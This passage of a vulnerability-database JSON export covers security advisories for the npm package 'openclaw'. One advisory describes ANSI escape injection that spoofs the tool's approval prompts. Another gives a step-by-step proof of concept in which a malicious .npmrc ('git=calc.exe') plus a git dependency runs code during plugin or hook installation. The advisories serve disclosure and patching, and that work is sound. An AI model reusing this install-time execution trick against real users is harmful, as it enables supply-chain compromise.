-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42423","GHSA-q2gc-xjqw-qp89"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bkya-73v8-bber"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91507?format=json","vulnerability_id":"VCID-bnfh-rsk9-cfea","summary":"OpenClaw has ACP CLI approval prompt ANSI escape sequence injection\n## Summary\n\nACP CLI approval prompt ANSI escape sequence injection\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `>= 2026.2.13, <= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nACP tool titles could previously carry ANSI control sequences into approval prompts and permission logs, letting untrusted tool metadata spoof terminal output. Commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60` sanitizes tool titles at the source and broadens ANSI stripping to full CSI sequences.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60`.\n\n## Fix Commit(s)\n\n- `464e2c10a5edceb380d815adb6ff56e1a4c50f60`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35651","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10281","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10259","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10301","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35651"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"}],"url":"https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35651","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35651"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt"},{"reference_url":"https://github.com/advisories/GHSA-4hmj-39m8-jwc7","reference_id":"GHSA-4hmj-39m8-jwc7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hmj-39m8-jwc7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35651","GHSA-4hmj-39m8-jwc7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bnfh-rsk9-cfea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90992?format=json","vulnerability_id":"VCID-brfj-4shr-qkgc","summary":"OpenClaw has an Arbitrary Malicious Code Execution Vulnerability\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Summary\nDuring the installation phase of OpenClaw local plugins/hooks, the Git executable can be hijacked by a project-level .npmrc file, leading to arbitrary code execution during installation.\n\n### Details\nPlease note that the source code locations mentioned below are based on version openclaw-2026.3.13-1, but the issue has been confirmed to still exist in the current latest version, 2026.3.23.\n\nWhen installing a local plugin directory, local plugin archive, local hook pack directory, or local hook pack archive, OpenClaw first copies the source directory to a temporary `stageDir`, then executes the following in that directory:\n\n```\nnpm install --omit=dev --silent --ignore-scripts\n```\n\nSee `src/infra/install-package-dir.ts:176-199`.\n\nSince this process does not strip the project root `.npmrc`, and npm reads the project-level `.npmrc` during local project installation, an attacker could use a `.npmrc` file in a malicious plugin or hook directory to override npm’s `git` executable path. By leveraging a Git dependency, the attacker could trigger npm to call this malicious program, thereby executing arbitrary local code during the installation phase.\n\n**Affected Paths**\n\n- Plugin CLI entry point: `src/cli/plugins-cli.ts:199-255`\n- Hook CLI entry point: `src/cli/hooks-cli.ts:573-676`\n- Plugin local directory / archive installation: `src/plugins/install.ts:379-405`, `src/plugins/install.ts:541-565`\n- Hook local directory / archive installation: `src/hooks/install.ts:380-403`, `src/hooks/install.ts:443-470`\n- Actual execution of `npm install --ignore-scripts`: `src/infra/install-package-dir.ts:176-199`\n\n**Vulnerability Trigger Flow**\n\n1. The user executes one of the following commands:\n\n   - `openclaw plugins install <path-or-spec>`\n   - `openclaw hooks install <path-or-spec>`\n2. If the argument is a local directory or local archive, OpenClaw navigates to the local installation path.\n3. OpenClaw copies the source directory to a temporary `stageDir`. See `src/infra/install-package-dir.ts:176-177`.\n4. If `dependencies` are present in `package.json`, OpenClaw executes the following in `stageDir`:\n\n```\nnpm install --omit=dev --silent --ignore-scripts\n```\n\nSee `src/infra/install-package-dir.ts:188-199`.\n\n5. npm reads the project-level `.npmrc` file in this directory.  Official documentation: [`.npmrc`](https://docs.npmjs.com/cli/v11/configuring-npm/npmrc/)\n6. If `.npmrc` is set to `git=<path to malicious program>` and there is a git dependency in the dependency tree, npm will invoke that `git` program when resolving the dependency.  Official documentation: [`npm config git`](https://docs.npmjs.com/cli/v11/using-npm/config/)  Git dependency documentation: [`package.json`](https://docs.npmjs.com/cli/v11/configuring-npm/package-json/)\n7. Consequently, an attacker can execute arbitrary local programs during the plugin/hook installation phase without waiting for the plugin or hook to be loaded later.\n\n**Triggering Commands**\n\n- Plugin installation command:\n\n```\nopenclaw plugins install <path-or-spec>\n```\n\n- Hook installation command:\n\n```\nopenclaw hooks install <path-or-spec>\n```\n\nWhen `<path-or-spec>` is a local directory or local archive, it will be resolved to the path used by the `npm install --omit=dev --silent --ignore-scripts` command mentioned above.\n\n### PoC\n\n\n\nCurrently, `testpoc/` is a minimal PoC directory used to verify that “when installing local packages, OpenClaw enters the `npm install --ignore-scripts` path.” It is divided into two core sections:\n\ntestpoc/pkg/\nPurpose: Simulates the local package directory installed by `openclaw plugins install ...` or `openclaw hooks install ...`\ntestpoc/repo/\nPurpose: Simulates a Git dependency repository within the npm dependency tree\nDirectory Structure\n\ntestpoc/\n├─ pkg/\n│  ├─ .npmrc\n│  ├─ package.json\n│  └─ sample-hook/\n│     ├─ HOOK.md\n│     └─ handler.js\n└─ repo/\n   ├─ package.json\n   └─ .git/...\nFunction of Each Component\n\ntestpoc/pkg/.npmrc\n\nCurrent content:\ngit=calc.exe\nFunction: Overrides npm’s Git executable configuration.\nMeaning: When npm encounters a git dependency during installation, it will not call the system git but will attempt to call the program specified here.\nThis is the core trigger point of this PoC. See testpoc/pkg/.npmrc:1\ntestpoc/pkg/package.json\n\nCurrently, this is a “mixed-use” manifest that includes both plugin and hook fields:\n{\n  “name”: “probe-host”,\n  “version”: “1.0.0”,\n  “private”: true,\n  “openclaw”: {\n    “extensions”: [“./dist/index.js”],\n    “hooks”: [“./sample-hook”]\n  },\n  “dependencies”: {\n    “probe-git-dep”: “git+file:///D:/AI Agent Source/OpenClaw/openclaw-2026.3.13-1/.testpoc/repo”\n  }\n}\nIts functionality is divided into three layers:\nopenclaw.extensions: Allows it to be validated as a plugin package\nopenclaw.hooks: Enables it to be validated as a hook package\nThe Git URL in dependencies: Forces npm to enter the Git dependency resolution path during installation\nSee testpoc/pkg/package.json:1\ntestpoc/pkg/sample-hook/HOOK.md\n\nPurpose: To meet the minimum metadata requirements for a hook package.\nThis is the key file that allows `openclaw hooks install pkg` to pass the pre-check. See testpoc/pkg/sample-hook/HOOK.md:1\ntestpoc/pkg/sample-hook/handler.js\n\nCurrent content:\nexport default async function handler() {\n  return { ok: true };\n}\nPurpose: Meets the requirement that the hook directory must contain a handler entry file.\nIt is not a usage point in itself; its sole purpose is to allow OpenClaw to proceed to the dependency installation phase. See testpoc/pkg/sample-hook/handler.js:1\ntestpoc/repo/package.json\n\nCurrent content:\n{“name”:“probe-git-dep”,‘version’:“1.0.0”}\nPurpose: Serves as the minimum repository content corresponding to a Git dependency.\nThe focus is not on the repository code itself, but on the fact that “it is a Git repository,” allowing npm to perform Git-related operations on it. See testpoc/repo/package.json:1\ntestpoc/repo/.git/\n\nPurpose: Makes testpoc/repo/ a real Git repository rather than a regular directory.\nWhen npm resolves git+file://... When installing dependencies, this is treated as the Git source.\nHow the current PoC works\n\nIf installing via hooks:\n\nopenclaw hooks install testpoc/pkg\nThe trigger chain is:\n\nOpenClaw identifies testpoc/pkg as the local hook package path\nThrough pre-validation in openclaw.hooks, HOOK.md, and handler.js\nProceeds to src/infra/install-package-dir.ts:188-199\nExecutes:\nnpm install --omit=dev --silent --ignore-scripts\nnpm reads testpoc/pkg/.npmrc\nnpm processes the git dependency in package.json\nnpm attempts to call the git=calc.exe specified in .npmrc\n\n### Impact\nIt is best described as an installation-time local command execution / unsafe package-install configuration issue.\n\nMore precisely:\n\nOpenClaw installs local plugin and hook packs by running npm install --omit=dev --silent --ignore-scripts inside the staged package directory, see src/infra/install-package-dir.ts:188-199.\nIf that local package directory contains an attacker-controlled .npmrc, npm will still read it.\nIf .npmrc overrides npm’s git executable and the package has a git dependency, npm can invoke the attacker-chosen program during install.\n\nWho is impacted\n\nUsers who run:\n\nopenclaw plugins install <local path/archive>\nopenclaw hooks install <local path/archive>\n\nAnd who install a malicious or untrusted local package that includes:\n\na controlled .npmrc\na git dependency\na runnable attacker-controlled git target on that platform\n\nThis should be treated as a security issue, not just “malicious plugin behavior,” because the code execution happens during OpenClaw’s install workflow, before the plugin or hook is ever loaded as trusted runtime code.\n\nThe important distinction is:\n\nA normal “trusted plugin” case is: the operator installs a plugin, enables it, and later that plugin runs with plugin privileges.\nThis issue is different: OpenClaw’s installer executes npm install --omit=dev --silent --ignore-scripts inside an attacker-controlled package directory, and npm still honors attacker-controlled project config from .npmrc.\n\nThat means an untrusted local plugin or hook package can influence the package manager itself and reach arbitrary program execution at install time, via npm’s git setting and a git dependency, even though --ignore-scripts is present.\n\nWhy this matters from a security perspective:\n\nIt is install-time execution, not post-install trusted execution.\n\nThe execution is triggered by OpenClaw’s installer in src/infra/install-package-dir.ts:188-199.\n\nThis occurs before the package is accepted as a trusted loaded plugin/hook in the usual sense.\n\nIt defeats an expected safety boundary.\n\nThe code explicitly uses --ignore-scripts, which strongly suggests an intent to make installation safer.\n\nBut the installer still allows attacker-controlled package-manager configuration from .npmrc to affect execution.\n\nSo the current mitigation is incomplete in a security-relevant way.\n\nThe dangerous input is part of a supported user flow.\n\nOpenClaw explicitly supports installing plugins and hook packs from local directories and archives:\n\nsrc/cli/plugins-cli.ts:199-255\nsrc/cli/hooks-cli.ts:573-676\n\nThat makes “download a package/archive, then install it” a realistic operator action, not an artificial lab setup.\n\nThe issue is broader than plugin trust.\n\nThe problem is not “plugins can do bad things once trusted.”\n\nThe problem is “the installer consumes attacker-controlled package-manager config before trust is established.”\n\nThat is much closer to an unsafe install / supply-chain execution flaw than to ordinary trusted-plugin behavior.\n\nHooks are affected too.\n\nThe same installer path is used for hook packs, not only plugins.\n\nSo this is a shared install-surface issue, not an isolated plugin-runtime concern.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35641","reference_id":"","reference_type":"","scores":[{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.0119","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01189","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35641"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:30:45Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35641","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35641"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:30:45Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation"},{"reference_url":"https://github.com/advisories/GHSA-m3mh-3mpg-37hw","reference_id":"GHSA-m3mh-3mpg-37hw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m3mh-3mpg-37hw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"